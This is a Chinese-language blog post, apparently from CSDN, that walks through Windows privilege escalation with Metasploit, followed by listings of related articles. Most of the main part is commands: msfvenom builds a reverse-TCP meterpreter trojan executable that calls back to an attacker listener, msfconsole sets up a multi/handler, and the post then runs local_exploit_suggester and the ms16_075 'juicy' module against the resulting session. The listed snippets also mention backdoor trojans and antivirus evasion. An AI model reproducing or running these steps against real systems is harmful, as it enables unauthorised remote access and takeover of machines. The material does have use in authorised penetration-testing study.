使用metasplit 提权

原创 已于 2022-04-01 22:52:27 修改 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2022-03-26 23:59:28 首次发布
本文介绍如何使用msfvenom生成反弹shell木马并利用Metasploit框架进行监听及提权操作。通过具体步骤展示从生成木马、上传执行到最终获取系统权限的全过程。

生成反弹shell木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=12345 -f exe >s.exe        

 

开启监听

 msfconsole

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.15
set lport 12345
run

 

 将木马上传到目录中执行,成功返回一个会话,background挂起,使用模块use post/multi/recon/local_exploit_suggester进行审查

run执行,发现exploit/windows/local/ms16_075_reflection_juicy可利用,直接使用这个模块进行提权

use exploit/windows/local/ms16_075_reflection_juicy

set session 1

run

在msf6使用失败

Kali的Metasploit-Framework利用漏洞入侵Windows2003Server
路~可以走过
04-16 3789
根据上篇的塔建:https://blog.csdn.net/qq_41709494/article/details/89278964 #用VMware塔建Windows2003Server靶机,IP地址是:192.168.137.128 #还部分信息没截图就省略了 #塔建仅主机模式(Host-Only)网络Windows2003Server可以上网 #打勾允许其他网络用户...
使用metasploit对SQL server渗透测试
渗透测试
05-11 1070
文章目录前言一、使用nmap进行踩点二、使用metasploit进行扫描三、破解sqlserver密码四、查找服务器其他用户口令五、浏览SQL server六、后渗透总结 前言 简单介绍了使用metasploit对SQL server进行渗透测试 一、使用nmap进行踩点 db_nmap -sV -p1433 1434 192.168.1.106 #使用nmap进行扫描 services #显示出服务 db_namp -sU --script=ms-sql-info -p1434 192.168.1
metasploit怎么用? 基础(auxiliary、exploits、meterpreter)篇 (゚益゚メ) 渗透测试
寻觅的博客
02-05 3344
metasploit简介 metasploit具体是做什么用的百度上已经有很多解释了,这里就不在做过多赘述了,我们当前主要使用metasploit版本是metasploit-framework,简称(MSF)此版本是metasploit的一个免费开源版本,并且被集成到了kali系统中,此版本纯命令行操作,下面我们使用也是此版本。此版本和专业版相比少了一些自动化和可视化的操作方法,便利性有所不如,但基础功能齐全。metasploit的更新频率很高,能达到周更的地步,所以很多新功能主要靠自己摸索。这里的使用
2021-06-04msf结合漏扫模块suggester
qq_45290991的博客
06-04 792
转自月大佬的博客网站。。moonsec.com1、 windows 补丁审计工具使用 在终端下可以使用命令systeminfo 来查看系统的一些补丁信息 http://www.demo1.com/asp.aspx 补丁检测Windows-Exploit-Suggester https://github.com/GDSSecurity/Windows-Exploit-Suggester 下载工具 git clone https://github.com/GDSSecurity/Windows-Exploit
MSF后渗透(
最新发布
weixin_74737710的博客
10-03 686
在线比对补丁查找 exp: http://blog.neargle.com/win-powerup-exp-index/有一些软件是需要高限才能运行的,如果这个软件有漏洞,让这个高限运行的软件来执行我们的后门文件。重新再kali中设置一个监听,通过之后去运行后门文件,这样就获得了一个高限运行的后门。如果没打补丁 通过搜索 ms16-075 漏洞的利用工具,来对这个漏洞进行利用。进程迁移:将当前的进程,迁移到其他进程里面。排除上面收集到的两个补丁编号,剩下的就是我可以进行利用的。
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
【漏洞复现】Metasploit下利用ms16-075
cj_Hydra's Blog
04-13 4605
前言: ms16-075漏洞介绍: Windows SMB 服务器特升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特升漏洞,成功利用此漏洞的攻击者可以使用升的特执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应...
metasploit 简单使用教程
weixin_48103302的博客
08-28 1083
metasploit 使用教程前言一、Metasploit是什么?二、准备工作三、具体步骤 前言 Msfconsole供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部.
Metasploit4.14.0安装及windows中MSF终端使用
meyo的博客
09-11 2万+
Metasploit4.14.0安装及其windows终端使用本文档主要介绍Metasploit软件的功能,以及如何安装和使用Metasploit软件的方法。
第10章-Metasploit渗透测试之制作隐藏后门-v7.pdf
08-08
第10章-Metasploit渗透测试之制作隐藏后门-v7 本课程设计目的只用于教学,切勿使用课程中的技术进行违法活 动,学员利用课程中的造成的技术后果与讲师本人无关,倡导维护网络安 全人人有责,共同维护网络文明和谐。
SQLMAP常用命令速查表
浪子燕青的博客
02-23 3746
title: SQLMAP速查表 copyright: true top: 0 date: 2019-05-20 14:28:16 tags: 渗透测试 categories: 渗透测试 permalink: password: keywords: description: SQLMAP 相关资料,持续更新。 罪人们总是不在意为了邪恶的欲望把痛苦加在别人的身上,却在自己面临刑罚的时候恐惧和哀求。 使用经验总结 在一旦注入成功且获得精确信息通过以下详细参数来指定检索、枚举动作和动作执行对象:检索DBMS的.
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
weixin_51803729的博客
02-11 7805
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 1万+
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
metasploit最新版
10-11
渗透测试工具metasploit最新版。安装之前先关闭杀毒软件。
0x02.第二课 Metasplioit对matasplitable的攻击.pdf
06-24
0x02.第二课 Metasplioit对matasplitable的攻击.pdf
Metasploit入门用法(主动攻击)
qq_50854662的博客
05-29 3819
–作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。 由于我现在对metasploit的深入度并不足,只能使用metasploit做一些初级入门的系统测试,一下是常规步骤和方法: 1、 使用nmap进行端口扫描 2、 使用search命令查找相关模块 3、 使用use调度模块 4、 使用info查看模.
使用kail中Metasploit获取Windows的限并
yuchen的博客
01-07 2258
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
小白日记24:kali渗透测试之(四)--利用漏洞
ZiXuanFY的博客
10-09 5895
利用漏洞实例 前:已渗透进一个XP或2003系统 一、实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Tit
Metasploit(MSF)基础超级详细版
懂进攻知防守
08-02 1万+
The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。 metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。 ............
113.网络安全渗透测试—[升篇11]—[Windows 2003 Mysql MOF]
qwsn
07-06 2298
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而的原理就是在拥有了mysql的root限以后(其实就是获得了MySQL的启动身份),然后使用限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值